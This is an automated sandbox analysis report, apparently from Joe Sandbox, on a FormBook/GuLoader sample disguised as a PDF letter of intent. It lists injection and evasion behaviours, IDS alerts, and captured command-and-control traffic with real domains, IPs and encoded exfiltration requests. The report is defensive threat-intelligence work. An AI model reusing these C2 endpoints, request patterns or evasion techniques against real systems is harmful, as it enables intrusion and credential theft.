Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe

Overview

General Information

Sample name:Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
Analysis ID:1550554
MD5:629be165860d2336755de85467756639
SHA1:af1da57d01a00bf942e127cce60fb4208bfd9795
SHA256:e9617a78c93e6d5cdc1087dfa6e9bf9d63406e05b6b01135c189242a7c33718c
Tags:exeuser-TeamDreier
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Xwizard DLL Sideloading
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe (PID: 6876 cmdline: "C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe" MD5: 629BE165860D2336755DE85467756639)
    • Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe (PID: 1220 cmdline: "C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe" MD5: 629BE165860D2336755DE85467756639)
      • ybjXXpYwhPHZD.exe (PID: 5548 cmdline: "C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • xwizard.exe (PID: 3804 cmdline: "C:\Windows\SysWOW64\xwizard.exe" MD5: 8581F29C5F84B72C053DBCC5372C5DB6)
          • ybjXXpYwhPHZD.exe (PID: 2516 cmdline: "C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4996 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3108057800.0000000004600000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2383463131.0000000032C50000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000002.00000002.2383897911.0000000035AB0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000006.00000002.3108123087.0000000004650000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Xwizard DLL Sideloading
            Source: Process startedAuthor: Christian Burkard (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\xwizard.exe", CommandLine: "C:\Windows\SysWOW64\xwizard.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\xwizard.exe, NewProcessName: C:\Windows\SysWOW64\xwizard.exe, OriginalFileName: C:\Windows\SysWOW64\xwizard.exe, ParentCommandLine: "C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe" , ParentImage: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe, ParentProcessId: 5548, ParentProcessName: ybjXXpYwhPHZD.exe, ProcessCommandLine: "C:\Windows\SysWOW64\xwizard.exe", ProcessId: 3804, ProcessName: xwizard.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T20:32:32.980672+010020229301A Network Trojan was detected4.245.163.56443192.168.2.449730TCP
            2024-11-06T20:33:13.156494+010020229301A Network Trojan was detected4.245.163.56443192.168.2.449792TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T20:33:21.629609+010020507451Malware Command and Control Activity Detected192.168.2.4498443.33.130.19080TCP
            2024-11-06T20:33:45.370544+010020507451Malware Command and Control Activity Detected192.168.2.449965180.178.39.23580TCP
            2024-11-06T20:33:58.924339+010020507451Malware Command and Control Activity Detected192.168.2.450011203.161.49.19380TCP
            2024-11-06T20:34:12.569554+010020507451Malware Command and Control Activity Detected192.168.2.450015217.160.0.13280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T20:32:37.413179+010028032702Potentially Bad Traffic192.168.2.44973569.27.100.185443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T20:33:21.629609+010028554651A Network Trojan was detected192.168.2.4498443.33.130.19080TCP
            2024-11-06T20:33:45.370544+010028554651A Network Trojan was detected192.168.2.449965180.178.39.23580TCP
            2024-11-06T20:33:58.924339+010028554651A Network Trojan was detected192.168.2.450011203.161.49.19380TCP
            2024-11-06T20:34:12.569554+010028554651A Network Trojan was detected192.168.2.450015217.160.0.13280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T20:33:37.730040+010028554641A Network Trojan was detected192.168.2.449922180.178.39.23580TCP
            2024-11-06T20:33:40.308120+010028554641A Network Trojan was detected192.168.2.449938180.178.39.23580TCP
            2024-11-06T20:33:43.026832+010028554641A Network Trojan was detected192.168.2.449950180.178.39.23580TCP
            2024-11-06T20:33:51.292199+010028554641A Network Trojan was detected192.168.2.450001203.161.49.19380TCP
            2024-11-06T20:33:53.834312+010028554641A Network Trojan was detected192.168.2.450009203.161.49.19380TCP
            2024-11-06T20:33:56.388553+010028554641A Network Trojan was detected192.168.2.450010203.161.49.19380TCP
            2024-11-06T20:34:04.854646+010028554641A Network Trojan was detected192.168.2.450012217.160.0.13280TCP
            2024-11-06T20:34:07.463930+010028554641A Network Trojan was detected192.168.2.450013217.160.0.13280TCP
            2024-11-06T20:34:10.057706+010028554641A Network Trojan was detected192.168.2.450014217.160.0.13280TCP
            2024-11-06T20:34:19.192230+010028554641A Network Trojan was detected192.168.2.450016216.40.34.4180TCP
            2024-11-06T20:34:21.979086+010028554641A Network Trojan was detected192.168.2.450017216.40.34.4180TCP
            2024-11-06T20:34:24.595400+010028554641A Network Trojan was detected192.168.2.450018216.40.34.4180TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeReversingLabs: Detection: 42%
            Yara detected FormBook
            Source: Yara matchFile source: 00000006.00000002.3108057800.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2383463131.0000000032C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2383897911.0000000035AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3108123087.0000000004650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3110054215.0000000005050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 69.27.100.185:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: Binary string: mshtml.pdb source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000001.1949040328.0000000000649000.00000020.00000001.01000000.00000008.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ybjXXpYwhPHZD.exe, 00000005.00000002.3107024135.00000000006EE000.00000002.00000001.01000000.0000000A.sdmp, ybjXXpYwhPHZD.exe, 00000007.00000002.3106981368.00000000006EE000.00000002.00000001.01000000.0000000A.sdmp
            Source: Binary string: wntdll.pdbUGP source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2254898946.0000000032DB8000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2252886370.0000000032C0C000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000006.00000003.2349818754.00000000043F2000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000006.00000003.2352861018.00000000045AD000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2254898946.0000000032DB8000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2252886370.0000000032C0C000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, xwizard.exe, 00000006.00000003.2349818754.00000000043F2000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000006.00000003.2352861018.00000000045AD000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: xwizard.pdb source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2315947683.0000000002D21000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2316042059.0000000002D2E000.00000004.00000020.00020000.00000000.sdmp, ybjXXpYwhPHZD.exe, 00000005.00000002.3107515922.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000001.1949040328.0000000000649000.00000020.00000001.01000000.00000008.sdmp
            Source: Binary string: xwizard.pdbGCTL source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2315947683.0000000002D21000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2316042059.0000000002D2E000.00000004.00000020.00020000.00000000.sdmp, ybjXXpYwhPHZD.exe, 00000005.00000002.3107515922.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 0_2_004055D5 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004055D5
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 0_2_00406089 FindFirstFileW,FindClose,0_2_00406089
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 0_2_00402706 FindFirstFileW,0_2_00402706
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_028BC840 FindFirstFileW,FindNextFileW,FindClose,6_2_028BC840
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 4x nop then xor eax, eax6_2_028A9E90
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 4x nop then mov ebx, 00000004h6_2_04AB04E1

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49844 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49844 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49965 -> 180.178.39.235:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49938 -> 180.178.39.235:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49965 -> 180.178.39.235:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 216.40.34.41:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50015 -> 217.160.0.132:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49950 -> 180.178.39.235:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50015 -> 217.160.0.132:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50011 -> 203.161.49.193:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50009 -> 203.161.49.193:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50010 -> 203.161.49.193:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50012 -> 217.160.0.132:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50016 -> 216.40.34.41:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50014 -> 217.160.0.132:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50001 -> 203.161.49.193:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49922 -> 180.178.39.235:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50011 -> 203.161.49.193:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50018 -> 216.40.34.41:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50013 -> 217.160.0.132:80
            Source: Joe Sandbox ViewIP Address: 203.161.49.193 203.161.49.193
            Source: Joe Sandbox ViewIP Address: 69.27.100.185 69.27.100.185
            Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
            Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
            Source: Joe Sandbox ViewASN Name: NETSEC-HKNETSECHK NETSEC-HKNETSECHK
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49735 -> 69.27.100.185:443
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49792
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49730
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /quarantin/luiKzhysatQzs26.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.evolutioncosmetics.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /q97g/?DxvPV=zbk0AVfPEjjhe&9hCtofh=KK21uW0xHvorSk2oycLooT0dduzPm1jQDk2L0YWF9dCKmUutgv1vRlzTvSsha0PsjgX1XZeK5J0dHVwIQm2B/CQjdtgr4E8V5isvjSr0cCOwUpqlDVKok1k= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.regents.healthConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /tizt/?9hCtofh=qmi+mqOOYFdY+IQDoG3ujJtZIydFKoemcf68l9cfSo4s6etqUFq9dTq1GSeGSZSg4PJsoSCL3HUy+ahRuGvxi/sKjpSlqf0tlGM/91a/SP/ZaCXUGrS3HD4=&DxvPV=zbk0AVfPEjjhe HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.73613.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /n54u/?DxvPV=zbk0AVfPEjjhe&9hCtofh=ulF5vHaDZay2Ybep6qAhk1wtxYL4m99WqdjuqGF6KuylXEStCuZI2HnnajvzLLcIwfuU3NLav5OgU7G/d2ttg6MOKAz0GZXpV5QCkBYU0gl9adu5sQ6AV2I= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.eco-tops.websiteConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /8u3q/?9hCtofh=cm4ubz77/lIwMrhjFRgV76IEwgYIQWLXxQMTOGkT00YioQcuvl4ad7FbuK2ZVTUxGoXbXPFIPc1cKkfmvUrJeif3yFVy05no8pqYeg1JIWdJs5qV9s4yrtw=&DxvPV=zbk0AVfPEjjhe HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.astrext.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.evolutioncosmetics.com
            Source: global trafficDNS traffic detected: DNS query: www.regents.health
            Source: global trafficDNS traffic detected: DNS query: www.73613.shop
            Source: global trafficDNS traffic detected: DNS query: www.eco-tops.website
            Source: global trafficDNS traffic detected: DNS query: www.astrext.info
            Source: global trafficDNS traffic detected: DNS query: www.newhopetoday.app
            Source: unknownHTTP traffic detected: POST /tizt/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.73613.shopContent-Type: application/x-www-form-urlencodedConnection: closeCache-Control: max-age=0Content-Length: 204Origin: http://www.73613.shopReferer: http://www.73613.shop/tizt/User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Raw: 39 68 43 74 6f 66 68 3d 6e 6b 4b 65 6c 61 43 64 58 55 64 73 2b 71 4d 38 73 51 7a 30 67 37 68 76 51 79 31 75 45 65 79 45 49 39 75 74 6e 2f 67 59 66 59 41 74 35 50 56 77 42 7a 69 53 62 30 76 6f 4b 6e 36 31 5a 75 33 73 36 75 59 53 6b 6a 2f 7a 34 57 30 68 6f 62 4e 62 31 54 58 61 6f 66 46 74 31 37 2f 34 77 63 6b 65 67 68 6b 4a 36 51 2b 51 65 2f 6e 71 56 53 33 55 48 37 53 71 4d 7a 4f 59 41 71 72 38 74 42 71 76 46 6b 4d 71 4e 4b 75 5a 6f 38 74 64 2f 50 6c 69 6f 45 63 75 70 66 66 47 33 6c 32 63 52 6a 62 46 4b 50 55 6e 66 4a 44 62 31 64 4e 32 52 76 50 45 53 4f 52 36 6f 66 72 79 45 50 39 6e 39 51 51 52 57 67 3d 3d Data Ascii: 9hCtofh=nkKelaCdXUds+qM8sQz0g7hvQy1uEeyEI9utn/gYfYAt5PVwBziSb0voKn61Zu3s6uYSkj/z4W0hobNb1TXaofFt17/4wckeghkJ6Q+Qe/nqVS3UH7SqMzOYAqr8tBqvFkMqNKuZo8td/PlioEcupffG3l2cRjbFKPUnfJDb1dN2RvPESOR6ofryEP9n9QQRWg==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Wed, 06 Nov 2024 19:33:38 GMTTransfer-Encoding: chunkedConnection: closeX-Powered-By: 3.2.1Access-Control-Allow-Origin: *Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONSData Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Wed, 06 Nov 2024 19:33:41 GMTTransfer-Encoding: chunkedConnection: closeX-Powered-By: 3.2.1Access-Control-Allow-Origin: *Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONSData Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Wed, 06 Nov 2024 19:33:43 GMTTransfer-Encoding: chunkedConnection: closeX-Powered-By: 3.2.1Access-Control-Allow-Origin: *Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONSData Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Wed, 06 Nov 2024 19:33:46 GMTTransfer-Encoding: chunkedConnection: closeX-Powered-By: 3.2.1Access-Control-Allow-Origin: *Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONSData Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 19:33:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
